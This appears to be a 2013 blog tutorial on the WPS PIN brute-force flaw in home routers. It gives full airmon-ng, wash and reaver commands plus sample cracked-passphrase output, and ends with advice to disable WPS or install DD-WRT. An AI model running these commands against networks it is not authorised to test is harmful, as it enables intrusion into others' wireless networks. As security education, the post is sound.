Protect Your Wireless Network

May 12, 2013

Short of leaving your wireless network open, the Wifi Protected Setup (WPS) vulnerability is probably the single biggest security hole on any home wireless network.

About WiFi Protected Setup

WiFi Protected Setup is a security standard that comes enabled by default on many routers. Part of the WPS specification is a method for adding a device to the network using a PIN number. The router comes from the factory with a specific 8-digit PIN that can be used to authenticate devices.

Unfortunately, the WPS authentication protocol has a design flaw in how it communicates invalid PIN attempts. It splits the PIN in half and validates each half individually. This means there are 10^4 (10,000) possible values for the first half and 10^3 (1000) possible values for the second half of the pin (the last value is a checksum). Therefore the PIN can be brute-forced in 11,000 attempts instead of 10^8 or 100,000,000 attempts.

Performing the brute-force using Reaver

Reaver-wps is a tool that exploits the WPS design flaw by brute-forcing the PIN in separate stages. Depending on the router (and the device’s connection to it) it can take anywhere from 1- 10 seconds per PIN attempt. The entire process usually takes between 6-10 hours to complete.

Assuming you have both a BackTrack distribution and a wireless adapter that supports monitor mode at your disposal, the process is very easy. I would recommend using an external WiFi adapter like this one and disabling any other network adapters. Obviously, you should never perform this on someone else’s network!

#Check NIC
iwconfig

#Kill Existing NIC Processes
airmon-ng check kill

#Start NIC in Monitor Mode
airmon-ng start wlan0

#Look for your ESSID (make sure monitor mode works)
airodump-ng mon0

Ok, if you see your ESSID on airodump-ng you are up and running. Now you run the wash tool to see if your router is WPS enabled and therefore vulnerable to WPS brute-forcing.

#Scan for WPS Enabled APs
wash -i mon0 -c CHANNEL_NUM -C -s

If your ESSID shows up then you can go ahead and attempt to run reaver. Make sure you have a signal power greater than -60 or else you will have trouble trying pins.

#Run Reaver
reaver -i mon0 -b AP_MAC -vv

#Or if you already know your pin
reaver -i mon0 -b AP_MAC --pin 12345678

In a few hours, Reaver should respond with:

Pin cracked in 32642 seconds
WPS PIN: '68148124'
WPA PSK: '2legit2quit'
AP SSID: 'MC Hammer WiFi'

Bam! Password acquired.

Protect your router

If you have an option to disable WPS on your router you can try to disable it via the router’s GUI. However, turning off WPS in the router’s web interface doesn’t always ensure that WPS is turned off.

The best option is to flash your router with an alternative firmware such as DD-WRT. DD-WRT does not support WPS and running it will ensure that your router isn’t vulnerable to Reaver.